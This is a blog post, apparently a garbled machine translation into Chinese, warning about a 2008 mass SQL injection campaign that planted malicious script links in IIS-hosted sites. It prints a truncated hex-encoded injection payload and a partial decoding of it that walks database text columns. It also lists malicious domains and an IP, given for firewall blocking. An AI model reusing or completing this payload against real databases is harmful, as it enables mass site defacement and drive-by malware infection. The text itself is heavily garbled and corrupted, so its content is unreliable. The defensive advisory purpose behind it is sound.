許多SQL射入

我本星期初出版了a 崗位關於一個弱點在微軟視窗的幾個版本…
…好弱點現在被執行那裡是去在哪些的許多SQL射入另一個圓傳染了跑在IIS平臺的成千上萬的網站。

預先形成簡單的Google搜尋惡意劇本結果的蹤影完全成功 510,000修改過的頁.

與越來越使用SQL後端也使他們更加快速和更加動態的網站，它手段核實是關鍵的什麼信息得到存放或請求由那些數據庫-，特別是如果您允許用戶上裝一直發生以論壇、blogs，反饋形式等的內容。 除非那數據消毒，在它得到之前保存了您不可能控制什麼網站將顯示對用戶。 這是什麼SQL射入所有是，利用弱點在這些控制。

當前注射的惡意文件是1.js然而必須注意到它，這可能改變在任何個階段。 訪客到這個網站是†œtreated†到8不同盤剝為許多窗口基於應用包括目標， RealPlayer和iTunes。 不要因為您是非常可能得到傳染，參觀站點鏈接對這個站點。 Trendmicro命名了它注意密碼并且通過他們回到contollerâ ™s ip的€malware toj_agent.KAQ。

射入代碼像這樣在這種情況下開始(筆記，這不是完全代碼) ：

   DECLARE%20@S%20NVARCHAR (4000); SET%20@S=CAST (0x440045004300
 Â Â Â 4C00410052004500200040005400200076006100720063006800610072
 Â Â Â 00280032003500350029002C0040004300200076006100720063006800
 Â Â Â 610072002800320035003500290020004400450043004C004100520045
 Â Â Â 0020005400610062006C0065005F0043007500720073006F0072002000
 Â Â Â 43005500520053004F005200200046004F0052002000730065006C0065
 Â Â Â 0063007400200061002E006E0061006D0065002C0062002E006E006100
 Â Â Â 6D0065002000660072006F006D0020007300790073006F0062006A0065
 Â Â Â 00630074007300200061002C0073007900730063006F006C0075006D00
 Â Â Â 6E00730020006200200077006800650072006500200061002E00690064
 Â Â Â 003D0062002E0069006400200061006E006400200061002E0078007400
 Â Â Â 7900700065003D00270075002700200061006E0064002000280062002E
 Â Â Â 00780074007900700065003D003900390020006F007200200062002E00
    780074007900700065003D003300350020006†¦

，當解碼時成為：

  Â宣稱varchar的@T (255) 『@C varchar (255)宣稱Table_Cursor
 Â Â Â游標為精選的a.name'b.name從sysobjects a'syscolumns b
 Â Â Â a.id=b.id和a.xtype='u和的地方(b.xtype=99或b.xtype=35
   Â或b†¦

結果什麼發生？ 它在數據庫發現所有文本領域并且增加鏈接到惡意Java語言到將做您的網站自動地顯示他們的他們中的每一個。 那麼根本上什麼發生了是攻擊者尋找了包含querystring的(動態價值例如文章ID，產品號，和cetera)參量的任何類型ASP或ASPX頁并且設法使用那上裝他們的SQL射入代碼。

到目前為止三個不同領域用於主持惡意美滿的â€」 nmidahena.com， aspder.com 并且 nihaorr1.com. 有得到從這些站點裝載試圖使用不同的盤剝安裝一個網上賭博特洛伊人的一套文件。 現在最初的盤剝頁在所有領域是不能進入的，但那可能改變。 So if you’re a firewall administrator we recommend you to block access to them.

I would recommend that Administrators block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.

Info sourced from f-secure

Popularity: 3%

Written by Patrick S. Read more great feeds at is source WEBSITE
no comments.
Read more articles on otherSoftware and MS News.

• [+] Digg: Feature this article
• [+] Del.icio.us: Bookmark this article
• [+] Furl: Bookmark this article

Related articles

• How to install Live Mesh client on non-US systems (April 26th, 2008)
• XP Service Pack 3 (April 26th, 2008)
• Check out Windows Speech Recognition Macros (April 26th, 2008)
• Taking a Closer Look at the Origami Experience 2.0 (April 26th, 2008)
• Windows Server, SQL Server & Visual Studio Launch 2008 Resources (April 25th, 2008)